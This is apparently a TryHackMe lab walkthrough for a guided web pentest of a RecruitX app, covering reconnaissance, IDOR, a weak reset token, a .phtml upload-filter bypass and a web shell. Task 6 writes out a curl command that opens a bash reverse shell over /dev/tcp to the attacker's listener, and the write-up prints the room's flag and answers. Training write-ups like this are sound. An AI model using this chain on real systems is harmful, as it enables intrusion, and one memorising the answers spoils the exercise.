Room: https://tryhackme.com/room/guidedpentestweb
We explore a simple web pentest scenario, learning how small issues connect together, from finding hidden pages to gaining deeper access through weak validation and poor security checks.
Task 2: Reconnaissance and Enumeration
What version of the Apache server is running?
2.4.58
Solution:
nmap -sV -sC -p- 10.48.166.24
What database service is running on the target?
mysql
Solution:
Same nmap -sV scan as above; the service detection output identifies the database listener as MySQL.
What is the path to the password reset page?
/reset.php
Solution:

Task 3: IDOR
What is the name of the administrator user?
Sarah Mitchell
Solution:
http://10.48.166.24/profile.php?id=1
What role does James Crawford hold?
hiring_manager
Solution:
http://10.48.166.24/profile.php?id=2
Task 4: Weak Password Reset
How many digits long is the reset token?
6
Solution:

After resetting the password for s.mitchell@recruitx.thm and logging in, what role is displayed for that account in the dashboard?
Administrator
Solution:

Task 5: Admin Panel Access
What is the name of the PHP file responsible for handling file upload in the RecruitX web app?
upload.php
Solution:

What HTML attribute on the file input is used to restrict selectable file extensions on the client side?
accept (a client-side hint only; the browser applies it, so it is bypassed simply by editing the request)
Solution:

Which alternative PHP extension bypassed the upload filter?
.phtml
Solution:

Task 6: Remote Code Execution
What user is the web shell running as?
www-data
Solution:
Create a web shell that executes the value of its cmd parameter, saved with the .phtml extension that bypassed the filter in Task 5:
subl shell.phtml
Upload it to the target server through the upload form; it is then served from /uploads/documents/:


Start a listener on the attacking machine (10.48.83.210 in this session), then trigger a reverse shell through the cmd parameter:
nc -lvnp 4444
curl "http://10.48.166.24/uploads/documents/shell.phtml?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.48.83.210/4444+0>%261'"

What is the hostname of the target server?
recruitx-prod
Solution:

What is the flag?
THM{ch41n3d_vulns_4r3_d3v4st4t1ng}
Solution:
cd ubuntu/recruitx
cat flag.txt
Task 7: The Attack Chain
How many distinct vulnerabilities were chained together in this engagement?
4 (IDOR on profile.php, the guessable 6-digit reset token, the blocklist-based upload filter bypassed with .phtml, and remote code execution through the uploaded web shell)
What approach should be used instead of a blocklist when validating file uploads?
allowlist (accept only a fixed set of permitted extensions and content types and reject everything else, rather than trying to enumerate every dangerous extension)
That's a wrap!